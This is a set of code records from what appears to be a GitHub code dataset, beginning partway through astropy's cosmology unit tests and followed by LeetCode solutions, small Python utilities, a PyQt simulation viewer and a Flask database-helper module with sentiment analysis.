isinstance(cosmo.name, str) # type\n assert cosmo.name == self.cls_kwargs[\"name\"] # test has expected value\n\n # immutable\n match = (\n \"can't set\"\n if PYTHON_LT_3_11\n else f\"property 'name' of {cosmo.__class__.__name__!r} object has no setter\"\n )\n with pytest.raises(AttributeError, match=match):\n cosmo.name = None\n\n @abc.abstractmethod\n def test_is_flat(self, cosmo_cls, cosmo):\n \"\"\"Test property ``is_flat``.\"\"\"\n\n # ------------------------------------------------\n # clone\n\n def test_clone_identical(self, cosmo):\n \"\"\"Test method ``.clone()`` if no (kw)args.\"\"\"\n assert cosmo.clone() is cosmo\n\n def test_clone_name(self, cosmo):\n \"\"\"Test method ``.clone()`` name argument.\"\"\"\n # test changing name. clone treats 'name' differently (see next test)\n c = cosmo.clone(name=\"cloned cosmo\")\n assert c.name == \"cloned cosmo\" # changed\n # show name is the only thing changed\n c._name = cosmo.name # first change name back\n assert c == cosmo\n assert c.meta == cosmo.meta\n\n # now change a different parameter and see how 'name' changes\n c = cosmo.clone(meta={\"test_clone_name\": True})\n assert c.name == cosmo.name + \" (modified)\"\n\n def test_clone_meta(self, cosmo):\n \"\"\"Test method ``.clone()`` meta argument: updates meta, doesn't clear.\"\"\"\n # start with no change\n c = cosmo.clone(meta=None)\n assert c.meta == cosmo.meta\n\n # add something\n c = cosmo.clone(meta=dict(test_clone_meta=True))\n assert c.meta[\"test_clone_meta\"] is True\n c.meta.pop(\"test_clone_meta\") # remove from meta\n assert c.meta == cosmo.meta # now they match\n\n def test_clone_change_param(self, cosmo):\n \"\"\"\n Test method ``.clone()`` changing a(many) Parameter(s).\n Nothing here b/c no Parameters.\n \"\"\"\n\n def test_clone_fail_unexpected_arg(self, cosmo):\n \"\"\"Test when ``.clone()`` gets an unexpected argument.\"\"\"\n with pytest.raises(TypeError, match=\"unexpected keyword argument\"):\n cosmo.clone(not_an_arg=4)\n\n def test_clone_fail_positional_arg(self, cosmo):\n with pytest.raises(TypeError, match=\"1 positional argument\"):\n cosmo.clone(None)\n\n # ---------------------------------------------------------------\n # comparison methods\n\n def test_is_equivalent(self, cosmo):\n \"\"\"Test :meth:`astropy.cosmology.Cosmology.is_equivalent`.\"\"\"\n # to self\n assert cosmo.is_equivalent(cosmo)\n\n # same class, different instance\n newclone = cosmo.clone(name=\"test_is_equivalent\")\n assert cosmo.is_equivalent(newclone)\n assert newclone.is_equivalent(cosmo)\n\n # different class and not convertible to Cosmology.\n assert not cosmo.is_equivalent(2)\n\n def test_equality(self, cosmo):\n \"\"\"Test method ``.__eq__().\"\"\"\n # wrong class\n assert (cosmo != 2) and (2 != cosmo)\n # correct\n assert cosmo == cosmo\n # different name <= not equal, but equivalent\n newcosmo = cosmo.clone(name=\"test_equality\")\n assert (cosmo != newcosmo) and (newcosmo != cosmo)\n assert cosmo.__equiv__(newcosmo) and newcosmo.__equiv__(cosmo)\n\n # ---------------------------------------------------------------\n\n def test_repr(self, cosmo_cls, cosmo):\n \"\"\"Test method ``.__repr__()``.\n\n This is a very general test and it is probably good to have a\n hard-coded comparison.\n \"\"\"\n r = repr(cosmo)\n\n # class in string rep\n assert cosmo_cls.__qualname__ in r\n assert r.index(cosmo_cls.__qualname__) == 0 # it's the first thing\n r = r[len(cosmo_cls.__qualname__) + 1 :] # remove\n\n # name in string rep\n if cosmo.name is not None:\n assert 
f\"name={cosmo.name!r}\" in r\n assert r.index(\"name=\") == 0\n r = r[6 + len(cosmo.name) + 3 :] # remove\n\n # parameters in string rep\n for k, v in cosmo.parameters.items():\n sv = f\"{k}={v!r}\"\n assert sv in r\n assert r.index(k) == 0\n r = r[len(sv) + 2 :] # remove\n\n # ------------------------------------------------\n\n @pytest.mark.parametrize(\"in_meta\", [True, False])\n @pytest.mark.parametrize(\"table_cls\", [Table, QTable])\n def test_astropy_table(self, cosmo, table_cls, in_meta):\n \"\"\"Test ``astropy.table.Table(cosmology)``.\"\"\"\n tbl = table_cls(cosmo, cosmology_in_meta=in_meta)\n\n assert isinstance(tbl, table_cls)\n # the name & all parameters are columns\n for n in (\"name\", *cosmo.parameters):\n assert n in tbl.colnames\n assert np.all(tbl[n] == getattr(cosmo, n))\n # check if Cosmology is in metadata or a column\n if in_meta:\n assert tbl.meta[\"cosmology\"] == cosmo.__class__.__qualname__\n assert \"cosmology\" not in tbl.colnames\n else:\n assert \"cosmology\" not in tbl.meta\n assert tbl[\"cosmology\"][0] == cosmo.__class__.__qualname__\n # the metadata is transferred\n for k, v in cosmo.meta.items():\n assert np.all(tbl.meta[k] == v)\n\n # ===============================================================\n # Usage Tests\n\n def test_immutability(self, cosmo):\n \"\"\"\n Test immutability of cosmologies.\n The metadata is mutable: see ``test_meta_mutable``.\n \"\"\"\n for n in (*cosmo.parameters, *cosmo._derived_parameters):\n with pytest.raises(AttributeError):\n setattr(cosmo, n, getattr(cosmo, n))\n\n def test_pickle_class(self, cosmo_cls, pickle_protocol):\n \"\"\"Test classes can pickle and unpickle.\"\"\"\n # pickle and unpickle\n f = pickle.dumps(cosmo_cls, protocol=pickle_protocol)\n unpickled = pickle.loads(f)\n\n # test equality\n assert unpickled == cosmo_cls\n\n def test_pickle_instance(self, cosmo, pickle_protocol):\n \"\"\"Test instances can pickle and unpickle.\"\"\"\n # pickle and unpickle\n f = pickle.dumps(cosmo, protocol=pickle_protocol)\n with u.add_enabled_units(cu):\n unpickled = pickle.loads(f)\n\n assert unpickled == cosmo\n assert unpickled.meta == cosmo.meta\n\n\nclass TestCosmology(CosmologyTest):\n \"\"\"Test :class:`astropy.cosmology.Cosmology`.\n\n Subclasses should define tests for:\n\n - ``test_clone_change_param()``\n - ``test_repr()``\n \"\"\"\n\n def setup_class(self):\n \"\"\"\n Setup for testing.\n Cosmology should not be instantiated, so tests are done on a subclass.\n \"\"\"\n # make sure SubCosmology is known\n _COSMOLOGY_CLASSES[\"SubCosmology\"] = SubCosmology\n\n self.cls = SubCosmology\n self._cls_args = dict(\n H0=70 * (u.km / u.s / u.Mpc), Tcmb0=2.7 * u.K, m_nu=0.6 * u.eV\n )\n self.cls_kwargs = dict(name=self.__class__.__name__, meta={\"a\": \"b\"})\n\n def teardown_class(self):\n \"\"\"Teardown for testing.\"\"\"\n super().teardown_class(self)\n _COSMOLOGY_CLASSES.pop(\"SubCosmology\", None)\n\n # ===============================================================\n # Method & Attribute Tests\n\n def test_is_flat(self, cosmo_cls, cosmo):\n \"\"\"Test property ``is_flat``. 
It's an ABC.\"\"\"\n        with pytest.raises(NotImplementedError, match=\"is_flat is not implemented\"):\n            cosmo.is_flat\n\n\n# -----------------------------------------------------------------------------\n\n\nclass FlatCosmologyMixinTest:\n    \"\"\"Tests for :class:`astropy.cosmology.core.FlatCosmologyMixin` subclasses.\n\n    The test suite structure mirrors the implementation of the tested code.\n    Just like :class:`astropy.cosmology.FlatCosmologyMixin` is an abstract\n    base class (ABC) that cannot be used by itself, so too is this corresponding\n    test class an ABC mixin.\n\n    E.g. to use this class::\n\n        class TestFlatSomeCosmology(FlatCosmologyMixinTest, TestSomeCosmology):\n            ...\n    \"\"\"\n\n    def test_nonflat_class_(self, cosmo_cls, cosmo):\n        \"\"\"Test :attr:`astropy.cosmology.core.FlatCosmologyMixin.nonflat_cls`.\"\"\"\n        # Test it's a method on the class\n        assert issubclass(cosmo_cls, cosmo_cls.__nonflatclass__)\n\n        # It also works from the instance. # TODO! as a \"metaclassmethod\"\n        assert issubclass(cosmo_cls, cosmo.__nonflatclass__)\n\n        # Maybe not the most robust test, but so far all Flat classes have the\n        # name of their parent class.\n        assert cosmo.__nonflatclass__.__name__ in cosmo_cls.__name__\n\n    def test_is_flat(self, cosmo_cls, cosmo):\n        \"\"\"Test property ``is_flat``.\"\"\"\n        super().test_is_flat(cosmo_cls, cosmo)\n\n        # it's always True\n        assert cosmo.is_flat is True\n\n    def test_nonflat(self, cosmo):\n        \"\"\"Test :attr:`astropy.cosmology.core.FlatCosmologyMixin.nonflat`.\"\"\"\n        assert cosmo.nonflat.is_equivalent(cosmo)\n        assert cosmo.is_equivalent(cosmo.nonflat)\n\n    # ------------------------------------------------\n    # clone\n\n    def test_clone_to_nonflat_equivalent(self, cosmo):\n        \"\"\"Test method ``.clone()`` to_nonflat argument.\"\"\"\n        # just converting the class\n        nc = cosmo.clone(to_nonflat=True)\n        assert isinstance(nc, cosmo.__nonflatclass__)\n        assert nc == cosmo.nonflat\n\n    @abc.abstractmethod\n    def test_clone_to_nonflat_change_param(self, cosmo):\n        \"\"\"\n        Test method ``.clone()`` changing a(many) Parameter(s). No parameters\n        are changed here because FlatCosmologyMixin has no Parameters.\n        See class docstring for why this test method exists.\n        \"\"\"\n        # send to non-flat\n        nc = cosmo.clone(to_nonflat=True)\n        assert isinstance(nc, cosmo.__nonflatclass__)\n        assert nc == cosmo.nonflat\n\n    # ------------------------------------------------\n\n    def test_is_equivalent(self, cosmo):\n        \"\"\"Test :meth:`astropy.cosmology.core.FlatCosmologyMixin.is_equivalent`.\n\n        Normally this would pass up via super(), but ``__equiv__`` is meant\n        to be overridden, so we skip super().\n        e.g. FlatFLRWMixinTest -> FlatCosmologyMixinTest -> TestCosmology\n        vs   FlatFLRWMixinTest -> FlatCosmologyMixinTest -> TestFLRW -> TestCosmology\n        \"\"\"\n        CosmologyTest.test_is_equivalent(self, cosmo)\n\n        # See FlatFLRWMixinTest for tests. 
It's a bit hard here since this class\n # is for an ABC.\n\n # ===============================================================\n # Usage Tests\n\n def test_subclassing(self, cosmo_cls):\n \"\"\"Test when subclassing a flat cosmology.\"\"\"\n\n class SubClass1(cosmo_cls):\n pass\n\n # The classes have the same non-flat parent class\n assert SubClass1.__nonflatclass__ is cosmo_cls.__nonflatclass__\n\n # A more complex example is when Mixin classes are used.\n class Mixin:\n pass\n\n class SubClass2(Mixin, cosmo_cls):\n pass\n\n # The classes have the same non-flat parent class\n assert SubClass2.__nonflatclass__ is cosmo_cls.__nonflatclass__\n\n # The order of the Mixin should not matter\n class SubClass3(cosmo_cls, Mixin):\n pass\n\n # The classes have the same non-flat parent class\n assert SubClass3.__nonflatclass__ is cosmo_cls.__nonflatclass__\n\n\ndef test__nonflatclass__multiple_nonflat_inheritance():\n \"\"\"\n Test :meth:`astropy.cosmology.core.FlatCosmologyMixin.__nonflatclass__`\n when there's more than one non-flat class in the inheritance.\n \"\"\"\n\n # Define a non-operable minimal subclass of Cosmology.\n class SubCosmology2(Cosmology):\n def __init__(self, H0, Tcmb0=0 * u.K, m_nu=0 * u.eV, name=None, meta=None):\n super().__init__(name=name, meta=meta)\n\n @property\n def is_flat(self):\n return False\n\n # Now make an ambiguous flat cosmology from the two SubCosmologies\n with pytest.raises(TypeError, match=\"cannot create a consistent non-flat class\"):\n\n class FlatSubCosmology(FlatCosmologyMixin, SubCosmology, SubCosmology2):\n @property\n def nonflat(self):\n pass\n","repo_name":"astropy/astropy","sub_path":"astropy/cosmology/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":19240,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"18204389782","text":"class Solution:\n def isPalindrome(self, head: ListNode) -> bool:\n def reverseList(head: ListNode) -> ListNode:\n prev = None\n curr = head\n\n while curr:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n\n return prev\n\n slow = head\n fast = head\n\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n\n if fast:\n slow = slow.next\n slow = reverseList(slow)\n\n while slow:\n if slow.val != head.val:\n return False\n slow = slow.next\n head = head.next\n\n return True\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0234. 
Palindrome Linked List/0234.py","file_name":"0234.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"3002492226","text":"from itertools import zip_longest\n\nclass Solution:\n    def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n        \"\"\"\n        n1 = len(l1)\n        n2 = len(l2)\n        O(max(n1, n2)) space O(max(n1, n2)) time\n        \"\"\"\n        class ListIter():\n            def __init__(self, l: ListNode):\n                self.l = ListNode(next=l)\n            def __iter__(self):\n                return self\n            def __next__(self):\n                self.l = self.l.next\n                if self.l:\n                    return self.l.val\n                raise StopIteration\n        \n        l3 = ListNode()\n        li, rem = l3, False\n        for n1, n2 in zip_longest(ListIter(l1), ListIter(l2)):\n            li.next = ListNode()\n            li = li.next\n            s = (n1 if n1 else 0) + (n2 if n2 else 0) + rem\n            li.val, rem = (s - 10, True) if s >= 10 else (s, False)\n        if rem:\n            li.next = ListNode(1)\n        return l3.next","repo_name":"ayaskovets/leetcode","sub_path":"python/2.Add Two Numbers.py","file_name":"2.Add Two Numbers.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35298193763","text":"from .interface_widget import InterfaceWidget\nfrom ..simulation.bugworld import BugWorld\n\nfrom PyQt6.QtWidgets import (\n    QMainWindow,\n)\nfrom PyQt6 import QtCore\n\nimport time\n\nclass SimulationThread(QtCore.QThread):\n    iteration_done = QtCore.pyqtSignal(object)\n\n    def __init__(self, parent, world):\n        super().__init__(parent)\n        self.world = world\n    \n    def run(self):\n        while True:\n            time.sleep(1)\n            self.world.iterate_simulation()\n            self.iteration_done.emit(self.world.get_state())\n\n\nclass WorldViewer(QMainWindow):\n    def __init__(self, world):\n        super().__init__()\n        self.world = world\n        \n        self.interface_widget = InterfaceWidget(self.world.width, self.world.height)\n        self.setCentralWidget(self.interface_widget)\n        \n        self.interface_widget.on_start_button(self.start_sim)\n        \n        self.simulation_thread = None\n        \n\n    def update_window(self):\n        raise NotImplementedError()\n    \n    def on_iteration_ready(self, stuff):\n        print(stuff)\n    \n    def start_sim(self):\n        if self.simulation_thread is not None:\n            print(\"Already running simulation\")\n            return\n\n        self.simulation_thread = SimulationThread(parent=self, world=self.world)\n        self.simulation_thread.iteration_done.connect(self.on_iteration_ready)\n        self.simulation_thread.start()\n    ","repo_name":"frenebo/growers_and_eaters","sub_path":"src/scripts/view/worldviewer.py","file_name":"worldviewer.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26362702397","text":"def status(age):\n    status = \"\"\n    if (age <= 1):  # covers newborns (ages 0 and 1)\n        status = \"new born\"\n    elif (age >= 2 and age <= 10):\n        status = \"child\"\n    elif (age >= 11 and age <= 17):\n        status = \"young\"\n    elif (age >= 18 and age <= 49):\n        status = \"adult\"\n    elif (age >= 50 and age <= 79):\n        status = \"old\"\n    else:\n        status = \"very old\"\n    return status\n\nage = int(input(\"Enter the age: \"))\nprint(\"Status:\", status(age))","repo_name":"J16N/python-lab","sub_path":"Assignment-2/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
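A worked check of the carry handling used in addTwoNumbers above, with plain reversed digit lists instead of ListNode (the helper name is illustrative):

def add_reversed_digits(a, b):
    # digits are least-significant first, e.g. 342 -> [2, 4, 3]
    out, carry, i = [], 0, 0
    while i < max(len(a), len(b)) or carry:
        s = (a[i] if i < len(a) else 0) + (b[i] if i < len(b) else 0) + carry
        out.append(s % 10)
        carry = s // 10
        i += 1
    return out or [0]

assert add_reversed_digits([2, 4, 3], [5, 6, 4]) == [7, 0, 8]  # 342 + 465 = 807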
+{"seq_id":"24068605927","text":"from Library import Library\nfrom Book import Book\n\n# Create an instance of the Library class.\nmy_LIB = Library()\n\n# Add at least three book objects to the library.\nfirst_book = Book()\nfirst_book.title = \"Harry Potter\"\nfirst_book.author = \"J.K\"\nfirst_book.published_year = 2023\n\nsecond_book = Book()\nsecond_book.title = \"GOT\"\nsecond_book.author = \"John Snow\"\nsecond_book.published_year = 2023\n\n\nthird_book = Book()\nthird_book.title = \"Moonlight\"\nthird_book.author = \"Disney\"\nthird_book.published_year = 2023\n\n\nmy_LIB.add_book(first_book)\nmy_LIB.add_book(second_book)\nmy_LIB.add_book(third_book)\n\n# Display a list of available books in the library\nprint(my_LIB.list_available_books())\n\n# Check out one of the books\nmy_LIB.check_out_book(second_book)\n\n# Display the list of available books again.\nprint(my_LIB.list_available_books())\n\n# Return the checked-out book\nmy_LIB.return_book(second_book)\n\n# Display the list of available books once more\nprint(my_LIB.list_available_books())\n\nmy_LIB.check_out_book(third_book)\nprint(my_LIB.list_available_books())\n\nmy_LIB.check_out_book(third_book)\n\nmy_LIB.return_book(first_book)","repo_name":"dhee-tree/coding-challenges","sub_path":"01-LibrarySystem/LibrarySys.py","file_name":"LibrarySys.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37109451455","text":"import requests\nimport json\nfrom tqdm import tqdm\n\n\nwith open('symbol_to_coingecko_id.json') as f:\n    coingecko_ids = json.loads(f.read()).values()\n\n\nwith open('coingecko_prices.json') as f:\n    prices = json.loads(f.read())\n\nfor id in tqdm(coingecko_ids):\n    if id in prices:\n        continue\n    try:\n        response = requests.get(f'https://api.coingecko.com/api/v3/simple/price?ids={id}&vs_currencies=usd')\n        if response.status_code == 429:\n            print('Rate limited, exiting')\n            break\n        price = response.json()[id]['usd']\n        prices[id] = price\n    except Exception as e:\n        print(f'For id {id} got exception {str(e)}')\n\nwith open('coingecko_prices.json', 'w') as f:\n    f.write(json.dumps(prices, indent=4))\n    ","repo_name":"nebolax/velodrome-v1-arbitrage-searcher","sub_path":"fetch_coingecko_prices.py","file_name":"fetch_coingecko_prices.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36753072185","text":"import logging\nfrom timeit import default_timer\n\n\nlogger = logging.getLogger()\nstream_handler = logging.StreamHandler()\nfile_handler = logging.FileHandler('logs_func.txt', mode='a', encoding=None, delay=False, errors=None)\nlogger.addHandler(stream_handler)\nlogger.addHandler(file_handler)\nlogger.setLevel(logging.DEBUG)\n\n\ndef execution_time(func):\n    def delta_time(*args):\n        t1 = default_timer()\n        try:\n            return func(*args)\n        finally:\n            delta = default_timer() - t1\n            logging.info(f'Execution time: {delta}')\n    return delta_time\n\n\n@execution_time\ndef factorize(*number):\n    result = []\n    num_list = []\n    for num in number:\n        for n in range(1, num+1):\n            if num % n == 0:\n                num_list.append(n)\n        result.append(num_list)\n        num_list = []\n    return result\n\n\na, b, c, d = factorize(128, 255, 99999, 10651060)\nassert a == [1, 2, 4, 8, 16, 32, 64, 128]\nassert b == [1, 3, 5, 15, 17, 51, 85, 255]\nassert c == [1, 3, 9, 41, 123, 271, 369, 813, 2439, 11111, 33333, 99999]\nassert d == [1, 2, 4, 5, 7, 10, 14, 20, 28, 35, 70, 140, 76079, 152158, 304316, 380395, 532553, 760790, 1065106, 1521580, 2130212, 2662765, 5325530, 
10651060]\n","repo_name":"Strategs/module23","sub_path":"task2_funk.py","file_name":"task2_funk.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20210239390","text":"from model import (db, connect_to_db, User, Section, SectionAssignment,\n Prompt, PromptAssignment, Response)\nimport server\nfrom datetime import datetime\nfrom monkeylearn import MonkeyLearn\nimport os\nfrom random import choice, random\nfrom flask_bcrypt import Bcrypt\n\nML_API_KEY = os.environ['MONKEYLEARN_KEY']\nml = MonkeyLearn(ML_API_KEY)\n\nbcrypt = Bcrypt(server.app)\n\n# 'create' functions\ndef create_user(first, last, email, password, g_id=None, g_credentials=None):\n if password is not None:\n hashed_password = bcrypt.generate_password_hash(password).decode('utf-8')\n else:\n hashed_password = None\n\n user = User(first_name=first,\n last_name=last,\n email=email,\n hashed_password=hashed_password,\n g_id=g_id,\n g_credentials=g_credentials)\n db.session.add(user)\n db.session.commit()\n return user\n\n\ndef create_section(name, start, end=None, g_id=None):\n section = Section(name=name, start_date=start, end_date=end, g_id=g_id)\n db.session.add(section)\n db.session.commit()\n return section\n\n\ndef create_section_assignment(user, section, role):\n seas = SectionAssignment(user=user, section=section, role=role)\n db.session.add(seas)\n db.session.commit()\n return seas\n\n\ndef create_section_assignment_by_ids(user_id, section_id, role):\n seas = SectionAssignment(user_id=user_id, section_id=section_id, role=role)\n db.session.add(seas)\n db.session.commit()\n return seas\n\n\ndef create_prompt(content, user=None, prompt_type='text', response_type='text'):\n prompt = Prompt(user=user,\n prompt_type=prompt_type,\n response_type=response_type,\n content=content)\n db.session.add(prompt)\n db.session.commit()\n return prompt\n\n\ndef create_custom_prompt(content, user_id, prompt_type='text', response_type='text'):\n prompt = Prompt(user_id=user_id,\n prompt_type=prompt_type,\n response_type=response_type,\n content=content)\n db.session.add(prompt)\n db.session.commit()\n return prompt\n\n\ndef create_prompt_assignment(section, prompt, due_date, g_id=None, revisit_pras_id=None):\n pras = PromptAssignment(section=section,\n prompt=prompt,\n due_date=due_date,\n g_id=g_id,\n revisit_pras_id=revisit_pras_id)\n db.session.add(pras)\n db.session.commit()\n return pras\n\n\ndef create_prompt_assignment_by_ids(section_id, prompt_id, due_date, g_id=None, revisit_pras_id=None):\n pras = PromptAssignment(section_id=section_id,\n prompt_id=prompt_id,\n due_date=due_date,\n g_id=g_id,\n revisit_pras_id=revisit_pras_id)\n db.session.add(pras)\n db.session.commit()\n return pras\n\n\ndef create_revisit_assignment(revisit_pras_id, date, g_id=None):\n old_pras = PromptAssignment.query.get(revisit_pras_id)\n section_id = old_pras.section_id\n prompt_id = old_pras.prompt_id\n new_pras = PromptAssignment(section_id=section_id,\n prompt_id=prompt_id,\n due_date=date,\n g_id=g_id,\n revisit_pras_id=revisit_pras_id)\n db.session.add(new_pras)\n db.session.commit()\n return (new_pras, old_pras.section.g_id)\n\n\ndef create_response(user, pras, content, sub_date, g_id=None):\n\n analysis = ml.classifiers.classify(\n model_id='cl_pi3C7JiL',\n data=[content]\n )\n print(analysis.body[0]['classifications'][0]['tag_name'])\n print(analysis.body[0]['classifications'][0]['confidence'])\n\n sentiment = 
analysis.body[0]['classifications'][0]['tag_name']\n confidence = analysis.body[0]['classifications'][0]['confidence']\n\n # sentiment = choice(['Positive', 'Negative', 'Neutral'])\n # confidence = random()\n\n response = Response(user=user,\n prompt_assignment=pras,\n content=content,\n submission_date=sub_date,\n g_id=g_id,\n sentiment=sentiment,\n confidence=confidence)\n db.session.add(response)\n db.session.commit()\n return response\n\n\ndef create_response_by_ids(user_id, pras_id, content, sub_date, g_id=None):\n analysis = ml.classifiers.classify(\n model_id='cl_Jx8qzYJh',\n data=[content]\n )\n print(analysis.body[0]['classifications'][0]['tag_name'])\n print(analysis.body[0]['classifications'][0]['confidence'])\n\n sentiment = analysis.body[0]['classifications'][0]['tag_name']\n confidence = analysis.body[0]['classifications'][0]['confidence']\n\n # sentiment = choice(['Positive', 'Negative', 'Neutral'])\n # confidence = random()\n \n response = Response(user_id=user_id,\n pras_id=pras_id,\n content=content,\n submission_date=sub_date,\n g_id=g_id,\n sentiment=sentiment,\n confidence=confidence)\n db.session.add(response)\n db.session.commit()\n return response\n\n\n# 'read' functions\ndef get_user_by_email(email):\n return User.query.filter(User.email == email).first()\n\n\ndef get_sections_by_user_id(user_id):\n assignments = (SectionAssignment.query\n .options(db.joinedload('section'))\n .filter(SectionAssignment.user_id == user_id)\n .all())\n sections = [(assignment.section, assignment.role)\n for assignment in assignments]\n return sections\n\n\ndef get_section_name(section_id):\n section = Section.query.get(section_id)\n return section.name\n\n\ndef get_assignments_by_section_id(section_id):\n condition = (PromptAssignment.section_id == section_id)\n assignments = (PromptAssignment.query\n .filter(condition)\n .all())\n return assignments\n\n\ndef get_students_by_section_id(section_id):\n condition1 = (SectionAssignment.section_id == section_id)\n condition2 = (SectionAssignment.role == 'student')\n students = (SectionAssignment.query\n .options(db.joinedload('user'))\n .filter(condition1, condition2)\n .all())\n students_info = []\n for student in students:\n students_info.append({'user_id': student.user_id,\n 'first_name': student.user.first_name,\n 'last_name': student.user.last_name})\n return students_info\n\n\ndef get_assignments_to_date(section_id, date):\n condition1 = (PromptAssignment.section_id == section_id)\n condition2 = (PromptAssignment.due_date <= date)\n assignments = (PromptAssignment.query\n .filter(condition1, condition2)\n .all())\n return assignments\n\n\ndef get_pras_date(pras_id):\n pras = PromptAssignment.query.get(pras_id)\n return pras.due_date\n\n\ndef get_responses_by_assignment_id(assignment_id):\n pras = PromptAssignment.query.get(assignment_id)\n prompt_content = pras.prompt.content\n prompt_id = pras.prompt_id\n due_date = pras.due_date\n if pras.revisit_pras_id is not None:\n revisit = True\n orig_date = get_pras_date(pras.revisit_pras_id)\n else:\n revisit = False\n orig_date = None\n # get existing responses\n responses = (Response.query\n .options(db.joinedload('prompt_assignment'),\n db.joinedload('user'))\n .filter(Response.pras_id == assignment_id)\n .all())\n\n # if no responses yet, return\n if responses == []:\n return [prompt_content, prompt_id, due_date, revisit, orig_date, []]\n\n # get students\n condition1 = (SectionAssignment.section_id == pras.section_id)\n condition2 = (SectionAssignment.role == 'student')\n 
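    # Eager-load each assignment's user (joinedload below) so the roster loop
    # that merges responders and non-responders does not issue one extra
    # SELECT per student.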
seaction_assignments = (SectionAssignment.query\n .options(db.joinedload('user'))\n .filter(condition1, condition2)\n .all())\n students = []\n for seas in seaction_assignments:\n students.append(seas.user)\n\n # re-format responses\n res_info = []\n for res in responses:\n name = f'{res.user.first_name} {res.user.last_name}'\n res_info.append({'student': name,\n 'last_name': res.user.last_name,\n 'content': res.content,\n 'sentiment': res.sentiment,\n 'confidence': res.confidence,\n 'date': res.submission_date})\n if res.user in students:\n students.remove(res.user)\n\n # add in students who have not responded yet\n for student in students:\n name = f'{student.first_name} {student.last_name}'\n res_info.append({'student': name,\n 'last_name': student.last_name,\n 'content': 'No response yet.'})\n return [prompt_content, prompt_id, due_date, revisit, orig_date, res_info]\n\n\ndef get_pras_by_section_id(section_id):\n return (PromptAssignment.query\n .filter(PromptAssignment.section_id == section_id)\n .all())\n\n\ndef get_responses_by_student_and_section(student_id, section_id):\n prompt_assignments = get_pras_by_section_id(section_id)\n responses = []\n condition1 = (Response.user_id == student_id)\n for pras in prompt_assignments:\n condition2 = (Response.prompt_assignment == pras)\n res = (Response.query\n .filter(condition1, condition2)\n .first())\n if res:\n responses.append({'date': res.submission_date,\n 'prompt': pras.prompt.content,\n 'response': res.content,\n 'sentiment': res.sentiment,\n 'confidence': res.confidence})\n return responses\n\n\ndef get_response(pras_id, user_id):\n condition1 = (Response.pras_id == pras_id)\n condition2 = (Response.user_id == user_id)\n response = Response.query.filter(condition1, condition2).first()\n return response\n\n\ndef get_orig_res(pras_id, user_id):\n pras = PromptAssignment.query.get(pras_id)\n orig_pras = PromptAssignment.query.get(pras.revisit_pras_id)\n res = (Response.query\n .filter(Response.user_id == user_id,\n Response.pras_id == orig_pras.pras_id)\n .first())\n if res:\n return res.content\n else:\n return 'No response submitted'\n\n\ndef check_response(pras_id, user_id):\n condition1 = (Response.pras_id == pras_id)\n condition2 = (Response.user_id == user_id)\n response = Response.query.filter(condition1, condition2).first()\n if response:\n return True\n else:\n return False\n\n\ndef get_all_prompts(user_id):\n condition1 = (Prompt.user_id == user_id)\n condition2 = (Prompt.user_id == None)\n return Prompt.query.filter(condition1 | condition2).all()\n\n\ndef get_teacher_assignments():\n teacherAssignments = (SectionAssignment.query\n .options(db.joinedload('user'))\n .filter(SectionAssignment.role == 'teacher')\n .all())\n teachers = []\n for teas in teacherAssignments:\n teachers.append(teas.user)\n return teachers\n\n\ndef get_users_with_section_info():\n users = User.query.all()\n users_info = []\n for user in users:\n name = f'{user.first_name} {user.last_name}'\n user_sections = []\n sections = (SectionAssignment.query\n .filter(SectionAssignment.user_id == user.user_id)\n .all())\n for seas in sections:\n user_sections.append({'name': seas.section.name,\n 'id': seas.section.section_id,\n 'role': seas.role})\n users_info.append({'name': name,\n 'id': user.user_id,\n 'sections': user_sections})\n return users_info\n\n\ndef check_pras_date(section, date):\n pras = (PromptAssignment.query\n .filter(PromptAssignment.section == section,\n PromptAssignment.due_date == date)\n .first())\n if pras:\n return True\n else:\n return 
False\n\n\ndef get_user_by_gid(g_id):\n    return User.query.filter(User.g_id == g_id).first()\n\n\ndef get_user_gid(user_id):\n    user = User.query.get(user_id)\n    if user:\n        return user.g_id\n    else:\n        return None\n\n\ndef get_course_by_gid(g_id):\n    return Section.query.filter(Section.g_id == g_id).first()\n\n\ndef get_seas(user, section):\n    condition1 = (SectionAssignment.user == user)\n    condition2 = (SectionAssignment.section == section)\n    return SectionAssignment.query.filter(condition1, condition2).first()\n\n\ndef get_section(section_id):\n    return Section.query.get(section_id)\n\n\ndef get_prompt(prompt_id):\n    return Prompt.query.get(prompt_id)\n\n\ndef get_gid_of_section(section_id):\n    section = get_section(section_id)\n    return section.g_id\n\n\ndef get_credentials(user_id):\n    user = User.query.get(user_id)\n    return user.g_credentials\n\n\ndef get_prompt_content(prompt_id):\n    prompt = Prompt.query.get(prompt_id)\n    return prompt.content\n\n\ndef get_gid_of_pras(pras_id):\n    pras = PromptAssignment.query.get(pras_id)\n    return pras.g_id\n\n\ndef get_section_id_of_pras(pras_id):\n    pras = PromptAssignment.query.get(pras_id)\n    return pras.section_id\n\n\n# update functions\ndef update_user_with_gid(user, gid, credentials):\n    user.g_id = gid\n    user.g_credentials = credentials\n    db.session.commit()\n    return user\n\n\ndef update_user_at_first_login(user, first, last, password):\n    hashed_password = bcrypt.generate_password_hash(password).decode('utf-8')\n    user.first_name = first\n    user.last_name = last\n    user.hashed_password = 